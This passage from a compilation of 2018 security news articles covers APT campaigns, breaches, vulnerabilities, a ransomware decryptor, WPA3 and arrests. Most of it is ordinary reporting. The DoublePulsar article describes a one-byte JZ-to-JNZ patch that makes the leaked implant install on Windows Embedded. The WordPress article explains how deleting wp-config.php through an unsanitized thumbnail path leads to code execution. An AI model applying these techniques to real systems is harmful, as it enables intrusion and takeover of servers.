The email address used to register a C&C site was used to register a domain that resolves to a Hong Kong IP that was previously associated with a phishing campaign against Tibetans in 2016 and 2017. Thus, the researchers believe the same actor has been behind all three attacks.

A report on the phishing campaign suggested that a “low-level contractor” exhibiting “sloppy” tradecraft and utilizing inexpensive infrastructure was behind it. Thus, the 2017 campaign suggests “an increased level of sophistication for the attacker,” Recorded Future says.

The 2018 campaign started in January and continued until at least late April, showing a departure from the custom first-stage dropper and the adoption of a validator-style implant instead (which also checked PCs for security software). Based on the information gathered on the victim systems, the attackers would then selectively deploy njRAT onto specific machines.

This shift is part of a trend observed in the APT research community: both criminal and nation-state sponsored groups are increasingly relying on commodity malware and penetration testing tools, which not only allows them to blend in, but also means lower cost of retooling upon discovery.

Analyzing IPs and domains associated with these campaigns, the security researchers also discovered that Tibetans weren’t the only targets and say that the same group might have hit multiple targets since 2015.

The campaigns also appear connected to the FF-RAT malware that has been around since at least 2012, and which has been associated with Chinese APT activity exclusively. In 2015, the FBI said the malware was used to target the U.S. Office of Personnel Management (OPM).

“We assess FF-RAT was likely used by the same threat actors behind RedAlpha, possibly as early as 2016,” Recorded Future says.

“We do not currently possess enough evidence to categorically prove that the RedAlpha campaigns were conducted by a new threat actor. We have outlined some tentative connections, through infrastructure registrations to existing Chinese APTs, but a firm attribution requires further detail on the individuals and organizations behind the malicious activity,” the security firm concludes.


NSA-Linked Implant Patched to Work on Windows Embedded
28.6.2018 securityweek BigBrothers

DoublePulsar, one of the hacking tools the Shadow Brokers supposedly stole from the National Security Agency (NSA)-linked Equation Group, can now run on Windows Embedded devices.

The backdoor was released publicly in April last year along with a variety of Windows exploits that Microsoft had patched the month before. It is a sophisticated, multi-architecture SMB (Server Message Block) backdoor that can stay well hidden on infected machines.

In addition to SMB, it is also used as the primary payload in RDP (Remote Desktop Protocol) exploits in the NSA’s FuzzBunch software (an exploitation framework that resembles Rapid7’s Metasploit).

As it turns out, although it would work on a wide range of Windows releases, DoublePulsar wouldn’t work on devices running a Windows Embedded operating system, even if the platform itself is vulnerable to the NSA-linked exploits, a security researcher who uses the online handler of Capt. Meelo says.

Windows Embedded, the researcher discovered, was indeed vulnerable to the exploits, but the relevant Metasploit modules wouldn’t work on it. Using FuzzBunch, however, he verified that the target device was indeed vulnerable via the EternalBlue exploit.

While exploitation via the EternalBlue module and the result were successful, the installation of DoublePulsar failed, so the researcher decided to analyze the implant to discover why.

What he found was that one simple line of code was enough to make it work on Windows Embedded.

DoublePulsar was designed to check the Windows version on the target machine and take one installation path on Windows 7 or another (and perform other OS checks) on other platform iterations. However, there was no check for Windows Embedded, which generated an error message.

By simply modifying an instruction in the “Windows 7 OS Check,” the researcher was able to force the implant into taking that specific installation path.

“To do this, I went to Edit > Patch program > Change byte. Then I changed the value 74 (opcode of JZ) to 75 (opcode of JNZ). I then created a DIF file by going to File > Produce file > Create DIF file,” Capt. Meelo explains.

Using a script from a security enthusiast who calls himself StalkR, he then patched the modified .exe file and then moved the modified Doublepulsar-1.3.1.exe back to its original location. This resulted in a successful injection of the generated DLL payload to the target host.


Talos releases ThanatosDecryptor, a free Thanatos Ransomware decryptor
28.6.2018 securityaffairs
Ransomware

Experts from Cisco’s Talos team released a free decryption tool for the Thanatos ransomware to recover the files without paying the ransom.
The Thanatos ransomware first appeared in the threat landscape in February when it was discovered by researchers at the MalwareHunterTeam.

The experts from Talos believe the malware is being actively developed, it was being distributed as attachments to chat messages sent via Discord.

When the malware encrypts files it appends the .THANATOS extension to them. Once the encryption is completed, the malware connects to a specific URL to report the infection.

The Thanatos ransomware is the first ransomware to accept Bitcoin Cash payments, along with Bitcoin and Ethereum.

At the time of its discovery, experts from Talos discovered a series of issues with the encryption process that makes it impossible for attackers to successfully returning the data to the victim.

The experts observed several variants of the malware, the first ones were using the same Bitcoin address for all the victims and the payment processing was manual after the victims were instructed to send an email to the crooks.

Thanatos ransomware

The next version implemented the support for more crypto-currencies for the payment processing and included a unique MachineID in the ransom note to distinguish each infection. Victims were instructed to send the MachineID to the attacker via email.

The experts discovered at least one sample that they discovered was informing victims that the decryption was not available, likely because the malware was part of a sabotage.

Once executed on the victim’s machine, the malicious code copies itself into a subdirectory within %APPDATA%/Roaming, then it scans the system for files to encrypt searching them in the Desktop, Documents, Downloads, Favourites, Music, OneDrive, Pictures, and Videos folders.

The encryption keys are derived from the number of milliseconds since the system last booted, but experts noticed that the keys are 32 bits and can store up to 49.7 days’ worth of milliseconds.

The researchers pointed out that 49.7 days is much higher than the average amount of uptime on many systems, this makes brute-force attack easier.

“This value is a 32-bit number, meaning that the encryption key is effectively 32 bits as well. Additionally, the maximum number of milliseconds that can be stored in a 32-bit value is roughly 49.7 days’ worth, which is higher than the average amount of uptime on many systems due to patch installation, system reboots, and other factors.” states the analysis published by Cisco Talos. “This makes brute-forcing the key values significantly cheaper from a time perspective.”

“Another optimization can be made based on the fact that the system uptime is written to the Windows Event Log roughly once per day. Since Thanatos does not modify the file creation dates on encrypted files, the key search space can be further reduced to approximately the number of milliseconds within the 24-hour period leading up to the infection. At an average of 100,000 brute-force attempts per second (which was the baseline in a virtual machine used for testing), it would take roughly 14 minutes to successfully recover the encryption key in these conditions.”

Summarizing, the process of recovering the encryption key would take roughly 14 minutes.

The tool released by Talos only works with versions 1 and 1.1 of the Thanatos ransomware and on all current samples of the ransomware analyzed by the experts.

“Note: In order to decrypt files as quickly as possible, ThanatosDecryptor should be executed on the original machine that was infected and against the original encrypted files that the malware created.” concludes Talos.

The ThanatosDecryptor could be downloaded here.


FastBooking Hotel booking software firm suffered a data breach
28.6.2018 securityaffairs Incindent

A security breach suffered by the Hotel booking software provider FastBooking has affected hundreds of hotels worldwide.
The Hotel booking software provider FastBooking is the last victim of a data breach, the incident exposed personal details and payment card data of guests from affected hotels.

FastBooking offers hotel booking platform to more than 4,000 hotels in 100 countries.

According to the experts, the number of impacted hotels worldwide could be greater than 1000, roughly 380 only in Japan. The company did not provide details about the number of affected users.

The company promptly notified via email the incident to each affected hotel providing details about the number of affected guests.

“Following the discovery of a suspicious application, the server log files were analyzed
(computer activity traces) and we found out that some files containing data had leaked.” reads a notice published by the company.

“Fastbooking immediately eradicated the vulnerability and took steps to prevent this
incident from recurring and to mitigate any negative consequences: implementing higher security standards, changing passwords on our systems, and so on.”

The attackers exploited a vulnerability in the web app to back into the FastBooking system.

The breach was discovered by company staff that noticed the presence of the malware on the server. The malware is a backdoor that allows the attacker to gain control over the server and steal the sensitive data.

FastBooking

The company notified the data breach via emails, hackers compromised the server on June 14 and installed a malware on the company server that was used to exfiltrate the precious data.

The hotel chain Prince Hotels & Resorts in Japan already notified the data breach to its customers. The hotel chain announced that the incident affected 124,963 guests who stayed at 82 of its hotels.

“This notice is to make you aware that Prince Hotels & Resorts reservations system in English, Simplified Chinese, Traditional Chinese, and Korean have been impacted by an unauthorized access to or acquisition of your personal information.” reads the data breach notification.

“We have learned that Fastbooking in France which is a parent company of Fastbooking Japan, our reservations system operator for international guests, had an unauthorized access.”

Below the incident timeline:
June 14, 2018, 8:43 PM UTC – hackers breached FastBooking’s server.
June 19, 2018, 3:40 PM UTC – The company discovers intrusion.
June 19, 2018, 9:02 PM UTC – The company closes breach.

Experts believe this data breach could trigger a series of data breach notifications from all the affected hotels.


Unpatched WordPress file deletion vulnerability could allow site takeover and code execution
28.6.2018 securityaffairs
Vulnerebility

Seven months ago, security experts discovered a critical file deletion vulnerability that affects all WordPress versions, currently, the issue is still unpatched.
The vulnerability could be exploited to complete takeover of the websites running the popular CMS and gain arbitrary code execution. The issue is severe if we consider the potential impact, WordPress is the most popular CMS and according to w3tech, it is used by approximately 30% of all websites

A pre-requisite to exploit the vulnerability is that the attacker would have to gain privileges to edit and delete media files. The vulnerability cannot be exploited in massive attacks because it requires a user account.

“The vulnerability was reported 7 months ago to the WordPress security team but still remains unpatched.” reads a blog post published by RIPS Technologies.

“Thus, the vulnerability can be used to escalate privileges attained through the takeover of an account with a role as low as Author, or through the exploitation of another vulnerability/misconfiguration,”

An attacker could exploit the file deletion vulnerability to delete any file of the WordPress installation, as well as any other file on the server on which the PHP process user has the proper permissions to delete.

An arbitrary file deletion flaw occurs when it is possible to pass unsanitized input to a file deletion function.

In PHP an arbitrary file deletion occurs when the unlink() function is called and user input can affect parts of or the whole parameter $filename, which is the path of the file to delete, without undergoing proper sanitization.

The flaw resides in the WordPress Core, the code to trigger it was found in the wp-includes/post.php file:

file deletion vulnerability WordPress

In the wp_delete_attachement() function the content of $meta[‘thumb’] is used to invoke the unlink() without undergoing any sanitization.

The purpose of this snippet of code is to delete the thumbnail of an image alongside its deletion.

The exploitation of the flaw could allow the deletion of the entire WordPress installation and could allow circumventing security measures to execute arbitrary code on the server.

The experts highlighted that the attacker can delete the following files:

.htaccess that could include in some occasions security-related constraints (e.g., access constraints to some folders).
index.php files used to prevent the attacker listing files in WordPress folders.
wp-config.php that contains the database credentials.
RIPS Technologies reported the vulnerability to WordPress in November 2017, through the bug bounty program via HackerOne, even if the WordPress team estimated the availability of a patch in six months, no fix has been released to date.

The experts published a video PoC of the attack showing how to delete the wp-config.php file in order to trigger the WordPress installation process on the next visit to the website. The WordPress install acts as if it hasn’t been installed yet and the attacker could abuse this status to execute arbitrary code.

“Deleting this file of a WordPress installation would trigger the WordPress installation process on the next visit to the website. This is due to the fact that wp-config.php contains the database credentials, and without its presence, WordPress acts as if it hasn’t been installed yet.” continue the analysis. “An attacker could delete this file, undergo the installation process with credentials of his choice for the administrator account and, finally, execute arbitrary code on the server.”

The researchers provided a hotfix that can be integrated by admins into existing WordPress installations by adding it to the functions.php file of the active theme.

The fix checks that the data provided for the meta-value thumb does not contain code that would make path traversal possible, in this way the attacker cannot delete any file.

“The provided fix shall ultimately be seen as a temporary fix in order to prevent attacks. We cannot oversee all possible backwards compatibility problems with WordPress plugins and advise to make any modifications to your WordPress files with caution,” RIPS Technologies concludes.


House Passes Bill to Enhance Industrial Cybersecurity
27.6.2018 securityweek Cyber

The U.S. House of Representatives on Monday passed a bill aimed at protecting industrial control systems (ICS), particularly ones used in critical infrastructure, against cyberattacks.

The legislation, H.R. 5733, formally known as the “DHS Industrial Control Systems Capabilities Enhancement Act,” was introduced on May 9 by Rep. Don Bacon (R-NE) and it was approved by the House Committee on Homeland Security on June 6. The bill was announced a few weeks after the United States officially accused Russia of attempting to take control of critical infrastructure systems.

The new bill amends the Homeland Security Act of 2002 and requires the DHS’s National Cybersecurity and Communications Integration Center (NCCIC) to identify and mitigate threats and risks to ICS technologies and products used in critical infrastructure organizations.

House passes legislation aimed at strengthening industrial cybersecurity

The bill also requires NCCIC to maintain cross-sector incident response capabilities for ICS-related events, and provide technical assistance to end-users, product manufacturers, and other stakeholders in identifying and mitigating vulnerabilities in industrial control systems.

The agency is also required to provide the ICS community information on vulnerabilities based on collaboration with security researchers, manufacturers and industry end-users. The DHS will have to brief Congress every six months over the next four years.

The Congressional Budget Office (CBO) estimates that enacting this piece of legislation would cost less than $500,000 over the 2019-2023 period due to the fact that NCCIC already provides assistance to critical infrastructure operators and control system vendors, and the bill would only codify the agency’s responsibilities without imposing any new operating requirements.

“The next ‘Pearl Harbor attack’ will not be with missiles and torpedoes alone, but will be paired with attacks to our private sector functions needed to support our daily lives, such as our electric grid,” said Rep. Bacon. “DHS provides critical support to operators of industrial control systems (ICS), and my bill clarifies this responsibility so the Department can continue to identify and address threats to ICS in critical infrastructure. Any disruption or damage to critical infrastructure has the potential to cause catastrophic consequences to our nation’s public health and safety, economic security, and national security.”


Toxic Content, Insider Threats Lurk in Business Collaboration Tools: Report
27.6.2018 securityweek Analysis

A new report quantifies what every manager instinctively knows: private messaging within collaboration tools can hide worrying content sent between employees. This can include confidential and sensitive data inappropriately shared, password sharing, and even toxic sentiment that could harm workplace productivity or highlight a nascent insider threat.

Wiretap, a firm that provides monitoring for collaboration tools such as Slack, Microsoft Teams, Yammer, Workplace by Facebook and Skype for Business, has analyzed (PDF) more than a million enterprise collaboration messages from tens of thousands of authors. The premise of the study is that without knowledge of the risks hidden in collaboration tools, organizations could become victims of their own staff, or possibly worse, eschew the undoubted benefits of collaboration tools altogether.

The Wiretap findings are categorized in three areas: sentiment, toxicity and insider threats.

Sentiment covers employees' moods and feelings towards the company and its leadership. "With an understanding of employee opinion, leaders can better determine where to invest in company culture, development, and workplace conditions," notes the report. Understanding how sentiment is shared in private conversations on company collaboration tools can help a firm reduce staff churn, and maintain a positive company culture.

Toxicity covers behavior including sexual harassment, racism and bullying. "Toxic employees have a way of spreading their behavior to others around them, similar to a nasty virus; crippling others' morale, performance, and productivity," warns the report; adding, "Unfortunately, companies like Uber, Fox News, or Nike know all too well the repercussions of turning a blind eye to toxic behavior."

In 2017, Uber fired more than 20 employees for sexual harassment. Had the company been aware of this toxic subculture within the firm, senior management could perhaps have prevented its growth. Wiretap believes that such issues could be first discovered by monitoring collaboration tools, and then remedied before they have a chance to root.

Insider threats come from naive users, malicious users, and even whistleblowers (whose motives may be subject to interpretation). They "are one of the most prevalent threats in an enterprise environment," says the report, "and are difficult to mitigate." It points out that an article in Harvard Business Review, "estimates that 80 million insider attacks occur annually, a cost that amounts to more than $10 billion in fines, penalties, or operational disruption."

Wiretap's analysis demonstrates that in each of these three areas, questionable content is far more likely to occur in the private areas of collaboration tools than in more traditional areas such as email. For example, 1 in 190 private messages are negative in sentiment, while only 1 in 280 public messages are similar.

Messages in private groups are 135% more likely to be toxic in content than messages in a public environment. This rises to 250% more likely in a private one-to-one conversation.

Private messages -- especially those displaying negative sentiment -- may also indicate potential insider threat issues. Employees rarely join a company with an intent to be a threat -- this grows over time as a response to real or perceived slights. Indeed, the cause may be entirely external to the company, caused by increasing domestic or financial pressures. Nevertheless, an indication of these stresses would likely show in internal private messages -- and if detected early enough, management can step in to defuse the situation, offer assistance, and keep an otherwise valuable employee.

"The truth is," warns the report, "people act one way in formal meetings and another way on their company's digital collaboration network. And this inconvenient truth can add a layer of risk, or a blind spot, for the organization."

“Our report sheds light on what we know," comments Jason Morgan, Wiretap’s vice president behavioral intelligence; "that human behavior is unpredictable – and despite the small population of risky users engaging in this behavior, organizations must be able to identify toxic actors before they ruin company culture. Ultimately, organizations need to track sentiment and tone of both public and private conversations to get a true pulse on the health of their community, and to assess any areas of potential risk.”

Most companies already monitor their users' use of corporate email -- indeed this is almost a necessity to comply with the personal data protection requirements of regulations such as the EU's General Data Protection Regulation (GDPR). Wiretap's Behavior Risk Analysis Report demonstrates that risky user communications are even more likely to occur in the relative privacy of collaboration tools than in traditional communication systems such as email.

The company's Aware by Wiretap product uses AI-infused monitoring to detect problems showing in private messages that would otherwise be missed by management. This allows for proactive recognition and mitigation before an issue can develop into a crisis.

In July 2017, Columbus, Ohio-based Wiretap closed a $4.9 million Series A financing round led by Pittsburgh-based Draper Triangle Ventures, Columbus-based Ohio Innovation Fund and Rev1 Ventures, as well as JumpStart Inc., bringing the total raised to $7.9 million.


Cisco ASA Flaw Exploited in DoS Attacks
27.6.2018 securityweek
Vulnerebility

Cisco has informed users that a recently patched vulnerability affecting its Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software has been exploited in denial-of-service (DoS) attacks.

The vulnerability, tracked as CVE-2018-0296 and classified “high severity,” was addressed with the patches released by Cisco in early June.

The flaw was reported to the networking giant by researcher Michal Bentkowski, who discovered that a remote and unauthenticated attacker could gain access to sensitive system information through directory traversal techniques. Cisco’s own analysis of the bug revealed that it can also be exploited to cause impacted devices to reload and enter a DoS condition.

According to Cisco, the vulnerability exists due to the lack of proper input validation of the HTTP URL. An attacker can exploit the security hole by sending specially crafted HTTP requests to the targeted device.

The list of impacted devices includes 3000 series Industrial Security Appliances, ASA firewalls, and Firepower products.

Cisco updated its advisory last week to warn users that the vulnerability has been exploited to cause a DoS condition. The company noted that it has not seen any attacks attempting to leverage the flaw to obtain sensitive information.

“Cisco PSIRT has become aware of a public proof-of-concept exploit and is aware of customer device reloads related to this vulnerability. Cisco strongly recommends that customers upgrade to a fixed Cisco ASA software release to remediate this issue,” Cisco wrote in its advisory.

Bentkowski has made public the technical details of the flaw (blog post written in Polish) and at least two other researchers have published PoC exploits that can be used to obtain sensitive information, including usernames.

HackerOne’s Yassine Aboukir, who published a PoC on GitHub on June 21, noted that it’s easy to find vulnerable devices on the Internet using Shodan, Censys and even Google.

GreyNoise Intelligence has also been tracking exploitation of the vulnerability.

Cisco ASA vulnerability exploited in the wild


Recently discovered RANCOR cyber espionage group behind attacks in South East Asia
27.6.2018 securityaffairs CyberSpy

Security researchers at Palo Alto Networks have uncovered a new cyber espionage group tracked as RANCOR that has been targeting entities in South East Asia.
According to the experts, the RANCOR APT group has been targeting political entities in Singapore, Cambodia, and Thailand, and likely in other countries, using two previously unknown strain of malware. The two malware families were tracked as DDKONG and PLAINTEE.

The hackers leverage spear phishing messages using weaponized documents containing details taken from public news articles on political news and events. These decoy documents are hosted on legitimate websites, such as the website of the Cambodia Government, and Facebook.

“Throughout 2017 and 2018 Unit 42 has been tracking and observing a series of highly targeted attacks focused in South East Asia, building on our research into the KHRAT Trojan. ” reads the analysis published by PaloAlto Networks.

“Based on the evidence, these attacks appear to be conducted by the same set of attackers using previously unknown malware families. In addition, these attacks appear to be highly targeted in their distribution of the malware used, as well as the targets chosen. Based on these factors, Unit 42 believes the attackers behind these attacks are conducting their campaigns for espionage purposes.”

The recent campaign appears related to the KHRAT Trojan, a backdoor that was associated with the China-linked APT group tracked as DragonOK (also known as NetTraveler (TravNet), PlugX, Saker, Netbot, DarkStRat, and ZeroT i).

The KHRAT RAT provides attackers with the typical set of RAT features, including remote access to the victim system, keylogging, and remote shell access.

One of the IP addresses for the domains associated with the KHRAT backdoor led the researchers to websites mimicking popular technology companies (i.e. facebook-apps[.]com). The experts linked the malware PLAINTEE and a loader to the domain, they were able to analyze only six samples that were associated with 2 separate infrastructure clusters.

RANCOR

PaloAlto researchers discovered that both clusters were involved in the campaigns that targeted organizations in South East Asia.

Experts found at least one attack against a company leveraging a Microsoft Office Excel document with an embedded macro to execute the malware. The malware was hidden in the EXIF metadata property of the document. This technique was used last year by the Russia-linked APT group Sofacy.

Researchers uncovered another attack leveraging an HTML Application file (.hta), and a series of attacks that used DLL loaders.

“We identified three unique DLL loaders during this analysis. The loaders are extremely simple with a single exported function and are responsible for executing a single command.” continues the analysis.

The DDKONG was first detected in February 2017, it was used by other attackers in the wild differently from PLAINTEE that was used exclusively by the RANCOR group.

An interesting feature of the PLAINTEE malware it the use of a custom UDP protocol for network communications.

“The RANCOR campaign represents a continued trend of targeted attacks against entities within the South East Asia region. In a number of instances, politically motivated lures were used to entice victims into opening and subsequently loading previously undocumented malware families.” Palo Alto concludes. “These families made use of custom network communication to load and execute various plugins hosted by the attackers,”


The Wi-Fi Alliance announced the launch of the WPA3 security standard
27.6.2018 securityaffairs Safety

The Wi-Fi Alliance announced late on Monday the launch of the WPA3 security standard that promises to increase the Wi-Fi security.
The Wi-Fi Alliance officially launched the WPA3, the new Wi-Fi security standard that will address all known security issues affecting the precious standards and will mitigate wireless attacks such as the KRACK attacks and DEAUTH attacks.

The Wi-Fi Alliance includes tech giants like Apple, Cisco, Intel, Qualcomm, and Microsoft.

WPA Wireless security standard designed to authenticate wireless devices using the Advanced Encryption Standard (AES) protocol and to establish secure connections that hackers cannot spy on.

The new security standard replaces the WPA2 that is currently used by billions of devices every day.

WPA3 implements important improvements for Wi-Fi enabled devices, it aims at enhancing configuration, authentication, and encryption issues.

“WPA3 takes the lead in providing the industry’s strongest protections in the ever-changing security landscape,” said Edgar Figueroa, president and CEO of the Wi-Fi Alliance. “WPA3 continues the evolution of Wi-Fi security and maintains the brand promise of Wi-Fi Protected Access.”

WPA3 could operate in Personal and Enterprise modes for personal, enterprise, and IoT wireless networks.

The Personal mode implements enhanced protection against offline dictionary attacks and password guessing attempts. It offers a higher level of security even when the users choose weak passwords. The new standard leverages SAE (Simultaneous Authentication of Equals) handshake to introduce the use of forward secrecy in order to protect communications in case the secret password has been compromised.

The Enterprise mode implements 192-bit encryption for networks that require extra security.

Both the Personal and Enterprise modes don’t allow the use of legacy protocols and they require Protected Management Frames (PMF) to avoid eavesdropping.

Let’s summarized some of the most important improvements implemented by the new standard:

Protection Against Brute-Force Attacks
WPA3 provides enhanced protection against offline brute-force dictionary attacks, even when the users don’t choose complex passwords.

WPA3 Forward Secrecy
WPA3 provides forward secrecy to protect communications even if the attackers have compromised the password.

WPA3 strengthens user privacy in Public/Open Wi-Fi Networks
WPA3 improves user privacy in open networks through individualized data encryption. Communications between a device and the Wi-Fi access point is encrypted to prevent MitM attacks.

The system protects connections against passive eavesdropping without requiring a password by using Opportunistic Wireless Encryption (OWE). It provides each user unique individual encryption that secures traffic between their device and the Wi-Fi network.

Enhanced protection for Critical Networks
Critical networks, such as the ones used in financial and government environments, are protected with 192-bit encryption.

WPA3 security standard

The WiFi Alliance also announced the Wi-Fi Easy Connect, a new feature that makes it easier for users to connect IoT devices to wireless networks.

Wi-Fi Easy Connect is a replacement for Wi-Fi Protected Setup (WPS), which has been considered insecure. It allows users to add a new device with the router by simply scanning a QR code with your smartphone to automatically send Wi-Fi credentials to the new smart device.


Russian police detained cybercriminals who broke into the accounts of 700,000 customers of popular Internet stores
27.6.2018 securityaffairs CyberCrime

The Ministry of Internal Affairs of the Russian Federation and Group-IB have detained cybercriminals who broke into the accounts of 700,000 customers of popular Internet stores
The Administration “K” of the MIA of Russia, with the assistance of Group-IB, an international company specializing in the prevention of cyberattacks and the development of information security products, detained two cybercriminals who were breaking into and stealing the accounts of loyalty program members from popular online stores, payment systems and bookmakers. In total, about 700,000 accounts were compromised, 2,000 of which the hackers put up for sale for $5 each. The detainees admitted on the spot that they had earned at least 500,000 rubles. However, the real amount of damage remains to be determined.

The investigation began in November 2015, after a large-scale cyberattack was made on the website of a large online store to gain access to the personal accounts of the store’s loyalty program members, who received bonuses for purchases. In a month, about 120,000 accounts were compromised.

It was discovered that the attackers had collected compromised account information from various Internet services on hacker forums and used special programs to automatically guess passwords of accounts on the website of the online store.

The cybercriminals took advantage of the fact that many users of the website use the same login/password pair on several resources. If the logins and passwords came up on the website of the store under attack, they hacked those personal accounts. The hackers checked the amount of the accumulated bonuses and sold the compromised accounts on hacker forums at a price of $5 per account or 20-30% of the nominal balance of the accounts. The buyers then used them to pay for products with the bonuses.

It was quickly revealed that the hackers were engaged in more than selling compromised accounts. They also offered services for “hijacking” accounts—changing the phone number and e-mail on the accounts of the online store. The cost of that “service” was 10% of the bonus balance on the account.

To cover their tracks and hamper the companies’ security services, the hackers launched their attacks from different IP-addresses, using anonymizers and changing the digital fingerprint of the browser (User-Agent). In all, requests for authorization came from more than 35,000 unique IP addresses.

After large retailers began to check all orders with payment bonuses carefully in early 2016, the hackers switched to other lesser-known online stores. In addition, the hackers began to work on tips—information about new online stores with bonus programs and coupon services where it was possible to access personal accounts, for which the attackers promised to pay up to 50% of the amount received from the further sale of the compromised accounts.

In the course of the investigation, Group-IB specialists established the identities of the intruders. The leader of the group was a resident of Ryazan Region, born in 1998, and his partner, who provided technical support for their joint online store, resided in Astrakhan Region and was born in 1997. In May 2018, both were detained by the Administration “K” of the MIA of Russia. During a search, evidence of their unlawful activities was seized, along with narcotics. The cybercriminals were charged under part 2 of article 272 (“Illegal Accessing of Computer Information “) and article 228 (“Illegal Acquisition, Storage, Transportation, … of Narcotic Drugs “) of the Criminal Code of the Russian Federation. The suspects have confessed. The investigation is continuing.


RANCOR Cyber Espionage Group Uncovered
26.6.2018 securityweek  CyberSpy

A cyber espionage group that has remained undetected until recently, has been targeting South East Asia with two previously unknown malware families, according to Palo Alto Networks.

The group, referred to as RANCOR, has been targeting political entities in Singapore, Cambodia, and Thailand, but might have hit targets in other countries as well. The group mainly uses two malware families, DDKONG and PLAINTEE, the latter apparently being a new addition to its arsenal.

According to Palo Alto's reserachers, the attacks likely begin with spear phishing emails and use decoy documents containing details taken from public news articles on political news and events. These documents are hosted on legitimate websites, including a website belonging to the Cambodia Government, and Facebook.

The newly discovered campaign appears related to the KHRAT Trojan, a backdoor associated with the China-linked cyber espionage group known as DragonOK.

One of the IPs the KHRAT associated domains started resolving to in February 2018 led the researchers to websites mimicking popular technology companies, including one named facebook-apps[.]com. The researchers connected two malware samples to the domain, namely a loader and PLAINTEE.

Only six samples of the malware were found, and the researchers managed to link them to two infrastructure clusters that do not appear to overlap. Both clusters, however, were involved in attacks targeting organizations in South East Asia, and the malware was observed using the same file paths in each cluster.

At least one of the attacks used a Microsoft Office Excel document with an embedded macro to launch the payload. The main malicious code was embedded in an EXIF metadata property of the document. In another attack, an HTML Application file (.hta) was used, while other attacks used DLL loaders.

One of the DLLs downloaded a decoy from a government website that was previously used in a KHRAT attack and two DLLs (out of three) were found hosted on this same compromised website (the domain was likely hacked again in early 2018).

First observed in February 2017, the DDKONG malware might be used by multiple threat actors.

First observed in October 2017, PLAINTEE appears to be exclusively used by the RANCOR attackers. The malware uses a custom UDP protocol for its network communications, can add persistence on the victim machine, ensures only a single instance is running, and then starts collecting general system information.

The malware also beacons to the command and control (C&C) server and attempts to decode a configuration blob. After the server responds, the malware spawns several new threads to load and execute a new plugin that is to be received from the C&C in the form of a DLL with an export function of either ‘shell’ or ‘file’.

The researchers believe the attackers were sending commands to the malware manually, due to a long period of delay between these commands (automated commands are performed quicker).

“The RANCOR campaign represents a continued trend of targeted attacks against entities within the South East Asia region. In a number of instances, politically motivated lures were used to entice victims into opening and subsequently loading previously undocumented malware families. These families made use of custom network communication to load and execute various plugins hosted by the attackers,” Palo Alto concludes.


Window Snyder Joins Intel as Chief Software Security Officer
26.6.2018 securityweek IT

Intel on Monday announced that Window Snyder has joined the company’s Software and Services Group as chief software security officer, vice president and general manager of the Intel Platform Security Division.Window Snyder joins Intel

The decision, effective July 9, comes after Intel was forced to rethink its cybersecurity strategy following the disclosure of the Spectre and Meltdown vulnerabilities early this year, and less than one week after the chip giant announced the resignation of Brian Krzanich as CEO and member of the board of directors.

Window Snyder joins Intel

Snyder has worked in the cybersecurity industry for two decades, including as senior security strategist at Microsoft, co-founder of Matasano, security chief at Mozilla, and security and privacy product manager at Apple. Prior to joining Intel, she was Fastly’s chief security officer for three years.

“In this role with Intel, Window will be responsible for ensuring the company maintains a competitive security product roadmap across all segments in support of business group objectives and continues to engage with the external security ecosystem to apply industry trends and sensing to Intel roadmap differentiation,” said Doug Fisher, senior vice president and general manager of the Software and Services Group at Intel.

Specifically, according to Fisher, Snyder will be responsible – among other things – for working with operating system developers and the security industry to ensure that the company is informed on attacks, to help guide its response, to deliver differentiated security capabilities for data and workloads, and to “drive scale for security.”

Window Snyder


Eight Arrested for Roles in Email Fraud Schemes
26.6.2018 securityweek Crime

Eight individuals were arrested for their roles in a widespread, Africa-based business email compromise (BEC) conspiracy, the United States Department of Justice announced on Monday.

Following operation WireWire earlier this month, the new international effort named "Operation Keyboard Warrior", resulted in five individuals being arrested in the United States, along with three others in Ghana. Four more were indicted for their roles in the CEO schemes, but remain at large.

BEC is a type of fraud targeting decision-making positions within organizations via email, phone, or fax, to hijack wire transfers or trick them to authorize payments for fake invoices.

Tens of thousands fell victims to BEC schemes, while losses amount to billions. Victims include accounts payable personnel at Fortune 500 companies, global maritime shipping companies and their customers, and more.

As part of Operation Keyboard Warrior, DoJ coordinated with international law enforcement to disrupt online frauds perpetrated from Africa. The operation, which has been ongoing since at least 2012, allegedly defrauded U.S. companies and citizens of around $15 million, the Justice Department says.

The individuals arrested in the U.S. are Javier Luis Ramos Alonso, 28, a Mexican citizen residing in Seaside, California; James Dean, 65, of Plainfield, Indiana; Dana Brady, 61, of Auburn, Washington; Rashid Abdulai, 24, a Ghanaian citizen residing in the Bronx, New York, and Olufolajimi Abegunde, 31, a Nigerian citizen residing in Atlanta, Georgia.

Maxwell Atugba Abayeta aka Maxwell Peter, 26, and Babatunde Martins, 62, of Ghana and Benard Emurhowhoariogho Okorhi, 39, a Nigerian citizen who resides in Ghana, were arrested overseas and await their extradition. Sumaila Hardi Wumpini, 29; Dennis Miah, 34; Ayodeji Olumide Ojo, 35, and Victor Daniel Fortune Okorhi, 35, who were also charged in the indictment, remain at large.

The defendants are charged with conspiracy to commit wire fraud, wire fraud, conspiracy to commit money laundering, conspiracy to commit computer fraud, and aggravated identity fraud.

According to the indictment, the Africa-based coconspirators committed, or caused to be committed, intrusions into the servers and email systems of a Memphis-based real estate company in June and July 2016.

The defendants used spoofed email addresses and Virtual Private Networks to identify large financial transactions, engage into fraudulent email correspondence with relevant business parties, and redirect closing funds, through a network of U.S.-based money mules, to Africa. The scheme defrauded companies and individuals in Memphis of hundreds of thousands of dollars.

According to the indictment, some of the Africa-based defendants also engaged in various romance scams, fraudulent-check scams, gold-buying scams, advance-fee scams, and credit card scams. All the proceeds of these criminal activities were shipped and/or transferred from the United States to locations in Ghana, Nigeria, and South Africa.

Some of the defendants are also said to have been concealing their conduct by, among other means, “stealing or fraudulently obtaining personal identification information (PII) and using that information to create fake online profiles and personas,” the DoJ announcement reads.

“The defendants allegedly unleashed a barrage of international fraud schemes that targeted U.S. businesses and individuals, robbing them to the tune of approximately $15 million,” Acting Assistant Attorney General John P. Cronan of the Justice Department’s Criminal Division said.


Security Startup Quantum Xchange Promises Unbreakable Quantum-Safe Encryption
26.6.2018 securityweek  Crypto

Quantum Xchange Raises $10 Million, Launches Quantum Key Distribution Service

Bethesda, MD-based start-up Quantum Xchange has announced $10 Million Series A funding from New Technology Ventures, and the launch of the first commercial quantum key distribution (QKD) service in the U.S. The funding will support the deployment of a fiber network serving the Northeast Corridor from Washington D.C. to Boston, connecting the financial markets on Wall Street with back office operations in New Jersey.

